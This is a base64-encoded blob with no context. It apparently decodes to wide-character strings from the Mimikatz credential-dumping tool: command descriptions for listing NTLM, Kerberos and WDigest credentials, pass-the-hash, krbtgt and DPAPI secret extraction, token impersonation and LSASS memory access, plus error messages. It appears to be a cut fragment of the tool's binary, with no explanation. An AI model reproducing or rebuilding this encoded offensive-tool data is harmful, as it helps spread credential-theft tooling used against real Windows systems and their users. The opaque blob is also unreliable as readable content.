AACQAJAFAASQBOACAAQwBvAGQAZQAgACAAIAAgACAAIAAgACAAOgAgACUAMAA0AGgAdQAKAAAAAAAJAAkAQgBhAGMAawBnAHIAbwB1AG4AZAAgAHAAYQB0AGgAIAA6ACAAJQBzAAoAAAAJAAkAUABpAGMAdAB1AHIAZQAgAHAAYQBzAHMAdwBvAHIAZAAgACgAZwByAGkAZAAgAGkAcwAgADEANQAwACoAMQAwADAAKQAKAAAACQAJACAAWwAlAHUAXQAgAAAAAABwAG8AaQBuAHQAIAAgACgAeAAgAD0AIAAlADMAdQAgADsAIAB5ACAAPQAgACUAMwB1ACkAAAAAAGMAbABvAGMAawB3AGkAcwBlAAAAYQBuAHQAaQBjAGwAbwBjAGsAdwBpAHMAZQAAAGMAaQByAGMAbABlACAAKAB4ACAAPQAgACUAMwB1ACAAOwAgAHkAIAA9ACAAJQAzAHUAIAA7ACAAcgAgAD0AIAAlADMAdQApACAALQAgACUAcwAAAAAAAABsAGkAbgBlACAAIAAgACgAeAAgAD0AIAAlADMAdQAgADsAIAB5ACAAPQAgACUAMwB1ACkAIAAtAD4AIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApAAAAJQB1AAoAAAAJAAkAUAByAG8AcABlAHIAdAB5ACAAIAAgACAAIAAgACAAIAA6ACAAAAAAACUALgAqAHMAXAAAAHQAbwBkAG8AIAA/AAoAAAAJAE4AYQBtAGUAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAB0AGUAbQBwACAAdgBhAHUAbAB0AAAAAAAJAFAAYQB0AGgAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAABbAFUAUwBIAE8AUgBUAF0AIAAlAGgAdQAAAAAAWwBEAFcATwBSAEQAXQAgACUAdQAAAAAAWwBTAFQAUgBJAE4ARwBdACAAJQBzAAAAWwBCAFkAVABFACoAXQAgAAAAAABbAFMASQBEAF0AIAAAAAAAWwBBAFQAVABSAEkAQgBVAFQARQBdAAoAAAAAAAkACQAgACAARgBsAGEAZwBzACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAJAAkAIAAgAEsAZQB5AHcAbwByAGQAIAA6ACAAJQBzAAoAAAAJAAkAIAAgAFYAYQBsAHUAZQAgACAAIAA6ACAAAAAAAFsAVAB5AHAAZQAgACUAMgB1AF0AIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AYwByAGUAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBjAHIAZQBkACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AYwByAGUAZAAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AYwByAGUAZAAgADsAIABrAHUAbABsAF8AbQBfAHMAZQByAHYAaQBjAGUAXwBnAGUAdABVAG4AaQBxAHUAZQBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAAA8AE4AVQBMAEwAPgAAAAAAVABhAHIAZwBlAHQATgBhAG0AZQAgADoAIAAlAHMAIAAvACAAJQBzAAoAVQBzAGUAcgBOAGEAbQBlACAAIAAgADoAIAAlAHMACgBDAG8AbQBtAGUAbgB0ACAAIAAgACAAOgAgACUAcwAKAFQAeQBwAGUAIAAgACAAIAAgACAAIAA6ACAAJQB1ACAALQAgACUAcwAKAFAAZQByAHMAaQBzAHQAIAAgACAAIAA6ACAAJQB1ACAALQAgACUAcwAKAEYAbABhAGcAcwAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAKAAAAQwByAGUAZABlAG4AdABpAGEAbAAgADoAIAAAAAoAQQB0AHQAcgBpAGIAdQB0AGUAcwAgADoAIAAlAHUACgAAACAAWwAlADIAdQBdACAAQQB0AHQAcgBpAGIAdQB0AGUACgAAACAAIABGAGwAYQBnAHMAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACAAIABLAGUAeQB3AG8AcgBkACAAOgAgACUAcwAKAAAAIAAgAFYAYQBsAHUAZQAgACAAIAA6ACAAAAAAAGkAbgBmAG8AcwAAAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgAAAE0AaQBuAGUAUwB3AGUAZQBwAGUAcgAgAG0AbwBkAHUAbABlAAAAAABtAGkAbgBlAHMAdwBlAGUAcABlAHIALgBlAHgAZQAAAEYAaQBlAGwAZAAgADoAIAAlAHUAIAByACAAeAAgACUAdQAgAGMACgBNAGkAbgBlAHMAIAA6ACAAJQB1AAoACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AZQBtAG8AcgB5ACAAQwAgACgAUgAgAD0AIAAlAHUAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBlAG0AbwByAHkAIABSAAoAAAAAACUAQwAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAAQgBvAGEAcgBkACAAYwBvAHAAeQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAARwBhAG0AZQAgAGMAbwBwAHkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEcAIABjAG8AcAB5AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABHAGwAbwBiAGEAbAAgAGMAbwBwAHkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABTAGUAYQByAGMAaAAgAGkAcwAgAEsATwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABNAGkAbgBlAHMAdwBlAGUAcABlAHIAIABOAFQAIABIAGUAYQBkAGUAcgBzAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABNAGkAbgBlAHMAdwBlAGUAcABlAHIAIABQAEUAQgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABOAG8AIABNAGkAbgBlAFMAdwBlAGUAcABlAHIAIABpAG4AIABtAGUAbQBvAHIAeQAhAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAZQBsAGUAbQBlAG4AdABzACAAZgByAG8AbQAgAGMAbwBsAHUAbQBuADoAIAAlAHUACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIAByAGUAZgBlAHIAZQBuAGMAZQBzACAAZgByAG8AbQAgAGMAbwBsAHUAbQBuADoAIAAlAHUACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAXwBwAGEAcgBzAGUARgBpAGUAbABkACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAcgBlAGEAZAAgAHIAZQBmAGUAcgBlAG4AYwBlAHMACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAXwBwAGEAcgBzAGUARgBpAGUAbABkACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAcgBlAGEAZAAgAGYAaQByAHMAdAAgAGUAbABlAG0AZQBuAHQACgAAAGwAcwBhAHMAcgB2AAAAAABMc2FJQ2FuY2VsTm90aWZpY2F0aW9uAABMc2FJUmVnaXN0ZXJOb3RpZmljYXRpb24AAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBuAHQANQBfAGkAbgBpAHQAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAHMAZQBhAHIAYwBoAAoAAAAAAGIAYwByAHkAcAB0AAAAAABCQ3J5cHRPcGVuQWxnb3JpdGhtUHJvdmlkZXIAQkNyeXB0U2V0UHJvcGVydHkAAABCQ3J5cHRHZXRQcm9wZXJ0eQAAAEJDcnlwdEdlbmVyYXRlU3ltbWV0cmljS2V5AABCQ3J5cHRFbmNyeXB0AAAAQkNyeXB0RGVjcnlwdAAAAEJDcnlwdERlc3Ryb3lLZXkAAAAAQkNyeXB0Q2xvc2VBbGdvcml0aG1Qcm92aWRlcgAAAAAzAEQARQBTAAAAAABDAGgAYQBpAG4AaQBuAGcATQBvAGQAZQBDAEIAQwAAAEMAaABhAGkAbgBpAG4AZwBNAG8AZABlAAAAAABPAGIAagBlAGMAdABMAGUAbgBnAHQAaAAAAAAAQQBFAFMAAABDAGgAYQBpAG4AaQBuAGcATQBvAGQAZQBDAEYAQgAAAG0AcwB2AAAATABpAHMAdABzACAATABNACAAJgAgAE4AVABMAE0AIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAB3AGQAaQBnAGUAcwB0AAAATABpAHMAdABzACAAVwBEAGkAZwBlAHMAdAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAEwAaQBzAHQAcwAgAEsAZQByAGIAZQByAG8AcwAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAdABzAHAAawBnAAAATABpAHMAdABzACAAVABzAFAAawBnACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAbABpAHYAZQBzAHMAcAAAAEwAaQBzAHQAcwAgAEwAaQB2AGUAUwBTAFAAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABzAHMAcAAAAEwAaQBzAHQAcwAgAFMAUwBQACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzAAAAAABMAGkAcwB0AHMAIABhAGwAbAAgAGEAdgBhAGkAbABhAGIAbABlACAAcAByAG8AdgBpAGQAZQByAHMAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAAAAUwB3AGkAdABjAGgAIAAoAG8AcgAgAHIAZQBpAG4AaQB0ACkAIAB0AG8AIABMAFMAQQBTAFMAIABwAHIAbwBjAGUAcwBzACAAIABjAG8AbgB0AGUAeAB0AAAAAABtAGkAbgBpAGQAdQBtAHAAAAAAAFMAdwBpAHQAYwBoACAAKABvAHIAIAByAGUAaQBuAGkAdAApACAAdABvACAATABTAEEAUwBTACAAbQBpAG4AaQBkAHUAbQBwACAAYwBvAG4AdABlAHgAdAAAAAAAcAB0AGgAAABQAGEAcwBzAC0AdABoAGUALQBoAGEAcwBoAAAAawByAGIAdABnAHQAIQAAAGQAcABhAHAAaQBzAHkAcwB0AGUAbQAAAEQAUABBAFAASQBfAFMAWQBTAFQARQBNACAAcwBlAGMAcgBlAHQAAAB0AGkAYwBrAGUAdABzAAAATABpAHMAdAAgAEsAZQByAGIAZQByAG8AcwAgAHQAaQBjAGsAZQB0AHMAAABlAGsAZQB5AHMAAABMAGkAcwB0ACAASwBlAHIAYgBlAHIAbwBzACAARQBuAGMAcgB5AHAAdABpAG8AbgAgAEsAZQB5AHMAAABMAGkAcwB0ACAAQwBhAGMAaABlAGQAIABNAGEAcwB0AGUAcgBLAGUAeQBzAAAAAABjAHIAZQBkAG0AYQBuAAAATABpAHMAdAAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAE0AYQBuAGEAZwBlAHIAAAAAAHMAZQBrAHUAcgBsAHMAYQAAAAAAUwBlAGsAdQByAEwAUwBBACAAbQBvAGQAdQBsAGUAAAAAAAAAUwBvAG0AZQAgAGMAbwBtAG0AYQBuAGQAcwAgAHQAbwAgAGUAbgB1AG0AZQByAGEAdABlACAAYwByAGUAZABlAG4AdABpAGEAbABzAC4ALgAuAAAAUwB3AGkAdABjAGgAIAB0AG8AIABQAFIATwBDAEUAUwBTAAoAAAAAAFMAdwBpAHQAYwBoACAAdABvACAATQBJAE4ASQBEAFUATQBQACAAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBtAGkAbgBpAGQAdQBtAHAAIAA7ACAAPABtAGkAbgBpAGQAdQBtAHAAZgBpAGwAZQAuAGQAbQBwAD4AIABhAHIAZwB1AG0AZQBuAHQAIABpAHMAIABtAGkAcwBzAGkAbgBnAAoAAAAAAAAAAABPAHAAZQBuAGkAbgBnACAAOgAgACcAJQBzACcAIABmAGkAbABlACAAZgBvAHIAIABtAGkAbgBpAGQAdQBtAHAALgAuAC4ACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABMAFMAQQBTAFMAIABwAHIAbwBjAGUAcwBzACAAbgBvAHQAIABmAG8AdQBuAGQAIAAoAD8AKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AaQBuAGkAZAB1AG0AcAAgAHAASQBuAGYAbwBzAC0APgBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgACgAJQB1ACkAIAAhAD0AIABNAEkATQBJAEsAQQBUAFoAXwBOAFQAXwBNAEEASgBPAFIAXwBWAEUAUgBTAEkATwBOACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AaQBuAGkAZAB1AG0AcAAgAHAASQBuAGYAbwBzAC0APgBQAHIAbwBjAGUAcwBzAG8AcgBBAHIAYwBoAGkAdABlAGMAdAB1AHIAZQAgACgAJQB1ACkAIAAhAD0AIABQAFIATwBDAEUAUwBTAE8AUgBfAEEAUgBDAEgASQBUAEUAQwBUAFUAUgBFAF8ASQBOAFQARQBMACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AaQBuAGkAZAB1AG0AcAAgAHcAaQB0AGgAbwB1AHQAIABTAHkAcwB0AGUAbQBJAG4AZgBvAFMAdAByAGUAYQBtACAAKAA/ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAAbQBpAG0AaQBrAGEAdAB6ACAAeAA4ADYAIABjAGEAbgBuAG8AdAAgAGEAYwBjAGUAcwBzACAAeAA2ADQAIABwAHIAbwBjAGUAcwBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABLAGUAeQAgAGkAbQBwAG8AcgB0AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABMAG8AZwBvAG4AIABsAGkAcwB0AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAG8AZAB1AGwAZQBzACAAaQBuAGYAbwByAG0AYQB0AGkAbwBuAHMACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGUAbQBvAHIAeQAgAG8AcABlAG4AaQBuAGcACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEgAYQBuAGQAbABlACAAbwBuACAAbQBlAG0AbwByAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATABvAGMAYQBsACAATABTAEEAIABsAGkAYgByAGEAcgB5ACAAZgBhAGkAbABlAGQACgAAAAAACQAlAHMAIAA6AAkAAAAAAFUAbgBkAGUAZgBpAG4AZQBkAEwAbwBnAG8AbgBUAHkAcABlAAAAAABVAG4AawBuAG8AdwBuACAAIQAAAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAAAE4AZQB0AHcAbwByAGsAAABCAGEAdABjAGgAAABTAGUAcgB2AGkAYwBlAAAAUAByAG8AeAB5AAAAVQBuAGwAbwBjAGsAAAAAAE4AZQB0AHcAbwByAGsAQwBsAGUAYQByAHQAZQB4AHQAAAAAAE4AZQB3AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAUgBlAG0AbwB0AGUASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAAQwBhAGMAaABlAGQASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAAQwBhAGMAaABlAGQAUgBlAG0AbwB0AGUASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAAQwBhAGMAaABlAGQAVQBuAGwAbwBjAGsAAAAAAAoAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACAASQBkACAAOgAgACUAdQAgADsAIAAlAHUAIAAoACUAMAA4AHgAOgAlADAAOAB4ACkACgBTAGUAcwBzAGkAbwBuACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQBzACAAZgByAG8AbQAgACUAdQAKAFUAcwBlAHIAIABOAGEAbQBlACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAEQAbwBtAGEAaQBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAEwAbwBnAG8AbgAgAFMAZQByAHYAZQByACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAAAAAABMAG8AZwBvAG4AIABUAGkAbQBlACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAFMASQBEACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAUAByAGUAdgBpAG8AdQBzAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGsAcgBiAHQAZwB0ACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAZgBpAG4AZAAgAEsARABDACAAcABhAHQAdABlAHIAbgAgAGkAbgAgAEwAUwBBAFMAUwAgAG0AZQBtAG8AcgB5AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AawByAGIAdABnAHQAIAA7ACAASwBEAEMAIABzAGUAcgB2AGkAYwBlACAAbgBvAHQAIABpAG4AIABMAFMAQQBTAFMAIABtAGUAbQBvAHIAeQAKAAAACgAlAHMAIABrAHIAYgB0AGcAdAA6ACAAAAAAACUAdQAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAKAAAACQAgACoAIAAlAHMAIAA6ACAAAABEAFAAQQBQAEkAXwBTAFkAUwBUAEUATQAKAAAAZgB1AGwAbAA6ACAAAAAAAAoAbQAvAHUAIAA6ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBkAHAAYQBwAGkAXwBzAHkAcwB0AGUAbQAgADsAIABOAG8AdAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAZAAhAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AZABwAGEAcABpAF8AcwB5AHMAdABlAG0AIAA7ACAAUABhAHQAdABlAHIAbgAgAG4AbwB0ACAAZgBvAHUAbgBkACAAaQBuACAARABQAEEAUABJACAAcwBlAHIAdgBpAGMAZQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBkAHAAYQBwAGkAXwBzAHkAcwB0AGUAbQAgADsAIABEAFAAQQBQAEkAIABzAGUAcgB2AGkAYwBlACAAbgBvAHQAIABpAG4AIABMAFMAQQBTAFMAIABtAGUAbQBvAHIAeQAKAAAAbAB1AGkAZAAAAAAAaQBtAHAAZQByAHMAbwBuAGEAdABlAAAAcgB1AG4AAAB5AGUAcwAAAG4AbwAAAAAAAAAAAHUAcwBlAHIACQA6ACAAJQBzAAoAZABvAG0AYQBpAG4ACQA6ACAAJQBzAAoAcAByAG8AZwByAGEAbQAJADoAIAAlAHMACgBpAG0AcABlAHIAcwAuAAkAOgAgACUAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABNAGkAcwBzAGkAbgBnACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAGQAbwBtAGEAaQBuAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAATQBpAHMAcwBpAG4AZwAgAGEAcgBnAHUAbQBlAG4AdAAgADoAIAB1AHMAZQByAAoAAAAAAEEARQBTADEAMgA4AAkAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAxADIAOAAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAAMwAyACAAKAAxADYAIABiAHkAdABlAHMAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAxADIAOAAgAGsAZQB5ACAAbwBuAGwAeQAgAHMAdQBwAHAAbwByAHQAZQBkACAAZgByAG8AbQAgAFcAaQBuAGQAbwB3AHMAIAA4AC4AMQAgACgAbwByACAANwAvADgAIAB3AGkAdABoACAAawBiADIAOAA3ADEAOQA5ADcAKQAKAAAAQQBFAFMAMgA1ADYACQA6ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAyADUANgAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAANgA0ACAAKAAzADIAIABiAHkAdABlAHMAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAyADUANgAgAGsAZQB5ACAAbwBuAGwAeQAgAHMAdQBwAHAAbwByAHQAZQBkACAAZgByAG8AbQAgAFcAaQBuAGQAbwB3AHMAIAA4AC4AMQAgACgAbwByACAANwAvADgAIAB3AGkAdABoACAAawBiADIAOAA3ADEAOQA5ADcAKQAKAAAATgBUAEwATQAJADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAbgB0AGwAbQAgAGgAYQBzAGgALwByAGMANAAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAAMwAyACAAKAAxADYAIABiAHkAdABlAHMAKQAKAAAAbQBvAGQAZQAJADoAIAByAGUAcABsAGEAYwBpAG4AZwAgAE4AVABMAE0ALwBSAEMANAAgAGsAZQB5ACAAaQBuACAAYQAgAHMAZQBzAHMAaQBvAG4ACgAAACAAIAB8ACAAIABQAEkARAAgACAAJQB1AAoAIAAgAHwAIAAgAFQASQBEACAAIAAlAHUACgAAAAAAKgAqACAAVABvAGsAZQBuACAASQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgAgACoAKgAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAFMAZQB0AFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABEAHUAcABsAGkAYwBhAHQAZQBUAG8AawBlAG4ARQB4ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAARwBlAHQAVABvAGsAZQBuAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAVwBpAHQAaABMAG8AZwBvAG4AVwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAATQBpAHMAcwBpAG4AZwAgAGEAdAAgAGwAZQBhAHMAdAAgAG8AbgBlACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAG4AdABsAG0ALwByAGMANAAgAE8AUgAgAGEAZQBzADEAMgA4ACAATwBSACAAYQBlAHMAMgA1ADYACgAAACAAIAB8ACAAIABMAFUASQBEACAAJQB1ACAAOwAgACUAdQAgACgAJQAwADgAeAA6ACUAMAA4AHgAKQAKAAAAAAAgACAAXABfACAAbQBzAHYAMQBfADAAIAAgACAALQAgAAAAAAAgACAAXABfACAAawBlAHIAYgBlAHIAbwBzACAALQAgAAAAAAAAAAAACgAJACAAKgAgAFUAcwBlAHIAbgBhAG0AZQAgADoAIAAlAHcAWgAKAAkAIAAqACAARABvAG0AYQBpAG4AIAAgACAAOgAgACUAdwBaAAAAAAAKAAkAIAAqACAATABNACAAIAAgACAAIAAgACAAOgAgAAAAAAAKAAkAIAAqACAATgBUAEwATQAgACAAIAAgACAAOgAgAAAAAAAKAAkAIAAqACAAUwBIAEEAMQAgACAAIAAgACAAOgAgAAAAAAAKAAkAIAAqACAARABQAEEAUABJACAAIAAgACAAOgAgAAAAAAAKAAkAIAAqACAAUgBhAHcAIABkAGEAdABhACAAOgAgAAAAAAAKAAkAIAAqACAAUwBtAGEAcgB0AGMAYQByAGQAAAAAAAoACQAgACAAIAAgACAAUABJAE4AIABjAG8AZABlACAAOgAgACUAdwBaAAAACgAJACAAIAAgACAAIABDAGEAcgBkACAAIAAgACAAIAA6ACAAJQBzAAoACQAgACAAIAAgACAAUgBlAGEAZABlAHIAIAAgACAAOgAgACUAcwAKAAkAIAAgACAAIAAgAEMAbwBuAHQAYQBpAG4AZQByADoAIAAlAHMACgAJACAAIAAgACAAIABQAHIAbwB2AGkAZABlAHIAIAA6ACAAJQBzAAAAAAAJACAAIAAgACUAcw